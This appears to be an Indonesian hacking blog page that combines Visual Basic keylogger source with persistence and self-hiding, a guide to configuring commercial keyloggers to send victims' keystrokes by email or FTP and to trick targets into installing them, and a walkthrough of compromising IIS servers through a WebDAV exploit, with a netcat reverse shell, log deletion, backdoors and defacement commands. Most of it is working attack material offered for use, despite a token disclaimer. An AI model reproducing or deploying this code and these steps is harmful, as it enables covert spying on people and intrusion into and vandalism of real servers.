    Dim nKey As Long
    RegCreateKey LOCALMACHINE, “SOFTWARE\Microsoft\Windows\CurrentVersion\Run”, nKey
    If Len(App.Path) <= 3 Then
    RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & App.EXEName & “.exe”, Len(App.Path & App.EXEName & “.exe”)
    Else
    RegSetValueEx nKey, App.EXEName, 0, REG_SZ, App.Path & “\” & App.EXEName & “.exe”, Len(App.Path & “\” & App.EXEName & “.exe”)
    End If
    End Sub
    Private Sub Form_Unload(Cancel As Integer)
    Cancel = True
    Call SAVEDLL
    ENTERREGISTRY
    Unload Me
    End
    End Sub
    Private Sub tmrCAPTION_Timer()
    On Error Resume Next
    Me.Caption = sAppName
    Me.Visible = False
    App.TaskVisible = False
    App.Title = False
    RegisterServiceProcess GetCurrentProcessId(), RSP_SIMPLE_SERVICE
    End Sub
    Private Sub tmrLOG_Timer()
    On Error Resume Next
    Dim nKey, nChar As Integer
    Dim nText As String
    For nChar = 1 To 255
    nKey = GetAsyncKeyState(nChar)
    If nKey = -32767 Then
    nText = Chr(nChar)
    If nChar = VK_BACK Then
    nText = ” {B.S} ”
    ElseIf nChar = VK_CONTROL Then
    nText = ” {CTRL} ”
    ElseIf nChar = VK_SHIFT Then
    nText = ” {SHIFT} ”
    ElseIf nChar = VK_TAB Then
    nText = ” {TAB} ”
    ElseIf nChar = VK_RETURN Then
    nText = ” {ENTER} ”
    ElseIf nChar = VK_MENU Then
    nText = ” {ALT} ”
    ElseIf nChar = VK_ESCAPE Then
    nText = ” {ESC} ”
    ElseIf nChar = VK_CAPITAL Then
    nText = ” {CAPS} ”
    ElseIf nChar = VK_SPACE Then
    nText = ” {SP.B} ”
    ElseIf nChar = VK_UP Then
    nText = ” {UP} ”
    ElseIf nChar = VK_LEFT Then
    nText = ” {LEFT} ”
    ElseIf nChar = VK_RIGHT Then
    nText = ” {RIGHT} ”
    ElseIf nChar = VK_DOWN Then
    nText = ” {DOWN} ”
    ElseIf nChar = VK_F1 Then
    nText = ” {F1} ”
    ElseIf nChar = VK_F2 Then
    nText = ” {F2} ”
    ElseIf nChar = VK_F3 Then
    nText = ” {F3} ”
    ElseIf nChar = VK_F4 Then
    nText = ” {F4} ”
    ElseIf nChar = VK_F5 Then
    nText = ” {F5} ”
    ElseIf nChar = VK_F6 Then
    nText = ” {F6} ”
    ElseIf nChar = VK_F7 Then
    nText = ” {F7} ”
    ElseIf nChar = VK_F8 Then
    nText = ” {F8} ”
    ElseIf nChar = VK_F9 Then
    nText = “{F9}”
    ElseIf nChar = VK_F10 Then
    nText = ” {F10} ”
    ElseIf nChar = VK_F11 Then
    nText = ” {F11} ”
    ElseIf nChar = VK_F12 Then
    nText = ” {F12} ”
    ElseIf nChar = VK_SNAPSHOT Then
    nText = ” {PRINT SCRN} ”
    ElseIf nChar = VK_RBUTTON Then
    nText = ” {R.B} ”
    ElseIf nChar = VK_LBUTTON Then
    nText = ” {L.B} ”
    ElseIf nChar = VK_MBUTTON Then
    nText = ” {M.B} ”
    ElseIf nChar = VK_PERIOD Then
    nText = “.”
    ElseIf nChar = VK_COMMA Then
    nText = “,”
    ElseIf nChar = VK_NUMLOCK Then
    nText = ” {NUMLCK} ”
    ElseIf nChar = VK_NUMPAD0 Then
    nText = “0″
    ElseIf nChar = VK_NUMPAD1 Then
    nText = “1″
    ElseIf nChar = VK_NUMPAD2 Then
    nText = “2″
    ElseIf nChar = VK_NUMPAD3 Then
    nText = “3″
    ElseIf nChar = VK_NUMPAD4 Then
    nText = “4″
    ElseIf nChar = VK_NUMPAD5 Then
    nText = “5″
    ElseIf nChar = VK_NUMPAD6 Then
    nText = “6″
    ElseIf nChar = VK_NUMPAD7 Then
    nText = “7″
    ElseIf nChar = VK_NUMPAD8 Then
    nText = “8″
    ElseIf nChar = VK_NUMPAD9 Then
    nText = “9″
    End If
    txtLOGGED.Text = txtLOGGED.Text + nText
    End If
    Next
    Call GetActiveWindowName
    End Sub
    Private Sub tmrSAVE_Timer()
    Call SAVEDLL
    txtLOGGED.Text = vbNullString
    txtENUMERATE.Text = vbNullString
    End Sub
    ====code end ===========
    ============code mulai ============
    ‘module visual basic
    ‘simpan dg nama mdlActiveWindow.bas
    Option Explicit
    Public Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
    Public Declare Function GetForegroundWindow Lib “user32″ () As Long
    Public Declare Function GetClassName Lib “user32″ Alias “GetClassNameA” (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
    Public nCAPTION As String
    Public nTESTER As Long
    Public nClass As String
    Public Sub GetActiveWindowName()
    nCAPTION = Space(256)
    nClass = Space(256)
    GetWindowText GetForegroundWindow, nCAPTION, Len(nCAPTION)
    GetClassName GetForegroundWindow, nClass, Len(nClass)
    If nTESTER = GetForegroundWindow Then Exit Sub
    FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbCrLf & Time & ” ” & nCAPTION
    FRMLOG.txtENUMERATE.Text = FRMLOG.txtENUMERATE.Text & vbTab & nClass
    nTESTER = GetForegroundWindow
    End Sub
    ============= code end =============
    /* ——————————|EOF|—————————— */
    sumber : spyrozone.net
    ###############################################################

    keylogger kirim data ke email

    Artikel ini tidak bermaksud untuk memberitahukan kepada kalian bagaimana cara melakukan tindakan hacking atau menganjurkan kalian untuk melakukan tindakan hacking, hanya untuk berbagi pengalaman dan sharing.
    Pertama yang harus kalian lakukan adalah mendapatkan software yang bernama keylogger merupakan tool yang merekam semua aktifitas pada keyboard target komputer.
    Download softwarenya disini : http://www.ziddu.com/download/3170646/Perfect.Keylogger.v1.6.5.0.zip.html
    Kedua adalah melakukan setup pada software tersebut untuk mendapatkan log file yang akan dikirim kepada email yang tersetup pada pilih option pada software ini.
    Keterangan Langkah² Menjalankan Keylogger :
    1. Email penerima log attachment -> Ini di isi dengan email anda / email penerima hasil dari logging, misal: emailsaya@gmail.com
    2. SMTP Server -> Ini diisi dengan SMTP Server yang anda punya, misal: smtp.serversaya.net.id / smtp.indo.net.id
    3. Username SMPT server -> Ini diisi dengan username SMTP yang anda dapat dari username SMTP Server, misal: smtpsaya@serversaya.net.id / smtpsaya@indo.net.id
    4. Password SMPT server -> Password SMTP, di isi dengan password SMTP Anda :)
    Ketiga lakukan remote installation dengan mengcompile file .exe bisa software apa saja.
    Untuk melakukan compile remote installation sangat mudah kita dipandu dengan menu Wizard seperti pada gambar diatas.
    Terakhir adalah menyebarkan file .exe tersebut kepada komputer target terserah untuk menyebarkannya lakukan dengan cara kalian bagamana agar target mau melakukan install software yang sudah kalian compile. Ini cara hack yang bener benar terbukti.
    Sekali terinstal maka semua aktifitas komputer target akan terekam dan tidak terdeteksi oleh Anti virus. Software ini tidak gue complie jadi masih fresh.
    Artikel Posted By Yohan – Approved By BinusHacker Team
    Artikel Ini  Diupdate Oleh BinusHacker Team – Tambahan Cara Instlall Ardamax Keylogger Buat Kalian (^_^)

    1. Setelah menginstal program, ketika menjalankan untuk pertama kalinya akan diminta untuk memasukkan nama dan nomor serial key yang udah include didalam folder ketika di download. Silakan dilihat didalamnya.


    2. Setelah mengaktifkannya, langsung dibuka aja. Ketika Anda akan membukanya, Anda akan melihat icon ditambahkan ke dalam sistem tray. Langsung klik ajah.

    3511692621 cbd1d6bed1 Tutorial On Ardamax 3.0 Keyloggers
    3. Sekarang mari kita klik kanan pada ikon & lalu klik “Remote Installation”.

    4. Klik Next. Pada option “Additional components” pilih “Log viewer”.
    5. Next lanjut kepada “Invisibility” options. Centangin ajah semuanyabiar mantep Invisibilitynya.
    6. Next option “Security”, gak perlu sih, langsung NEXT lagi ajah.
    7. Next option “Web Update”, Jangan dicentangin semuanya / terserah sih maunya gimana, yg penting baca dulu perintah & maksudnya, kemudian klik NEXT.
    8. Kemudian akan muncul “Options” page.  Pilih seperti contoh dibawah ini.
    9. Cara dibawah ini harus dipastikan berjalan, klo gak jalan keyloggernya gak akan berhasil. Wajib diperhatikan!!
    Pilihlah sesuai dengan keinginan anda. Diharapkan anda menyeting dengan benar :)
    10. Isilah username & password FTP Account yang anda miliki. Seperti penjelasan sebelumnya di tahap awal cara setting FTP.
    11. Klik test, untuk melakukan test koneksi, apabila berhasil. Maka dipastikan keylogger anda berjalan dengan baik.
    12. Next ke “control” page, aturnya sesuai keinginan dah. Klo gak tau ya lewatin ajah.
    13. Next ke “Screen shot”, Klik Next ajah klo sudah tau artinya itu mah.
    14. Silakan pilih file untuk generate keylogger file.
    15. Selesai!
    16. Silakan gunakan dengan baik :)
    Catatan: Deactivate sementara anti virus anda, kadang ini terdeteksi sebagai admx virus / keylogger. Enjoy & Eat It!
    keylogger pengirim email lainnya download:

    Hacking Dengan IIS

    1) Pendahuluan
    Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
    2) Adanya Celah Keamanan
    Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
    Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
    Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
    Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
    Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
    Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
    3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
    Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
    D:\nc>nc -Lvp 6666
    Listening on [any] 6666 ….
    Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
    D:\vcproject\webdave\debug>web.exe
    [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
    www.coromputer.net && undernet #coromputer
    syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
    Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
    D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
    Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
    D:\nc>nc -Lvp 6666
    Listening on [any] 6666 ….
    connect to 200.200.200.200 from 123.123.123.123
    Microsoft(R) Windows 2000
    (C)Copyright Microsoft Corp 1981-2000.
    C:\winnt\system32>
    Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
    4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
    Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
    C:\winnt\system32> rmdir /s /q logfiles
    Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
    Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
    Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
    Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
    C:\inetpub\wwwroot> copy index.html indexold.html
    C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
    Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
    C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
    Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
    C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
    Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
    5) Kesimpulan
    Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
    Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.
     
    Klik689 © 2011 Templates | Nanda